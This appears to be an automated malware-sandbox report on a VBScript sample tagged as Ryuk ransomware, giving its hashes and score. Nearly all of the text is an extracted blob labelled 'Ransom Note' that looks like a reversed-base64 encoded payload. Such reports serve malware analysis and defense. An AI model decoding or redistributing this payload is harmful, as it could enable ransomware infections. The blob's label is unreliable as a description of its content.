ryuk | 7ccd80bd19a444e3344202bc28c864fba929d3fd97f4214bcd7ccd47b0bb0c96

General

Target

SiggiaW.vbs
Size

1KB
MD5

ac8c266035cf2993ef4dabcf3ee2b2b6
SHA1

a83110c8938103e85dc6517811a67e63646740d5
SHA256

7ccd80bd19a444e3344202bc28c864fba929d3fd97f4214bcd7ccd47b0bb0c96
SHA512

9c0cdc00af111ed96b8707d1490d90771f65cf98bef521d9a6e276ca7cff51e1d1449217d7228ff0edca3b4ac3939f69117bc3646c8bc5c50813d6f8c9b37954

Score

10^/10

ryuk ransomware upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\U0EJMF7X\base64[1].txt

Family

ryuk

Ransom Note

=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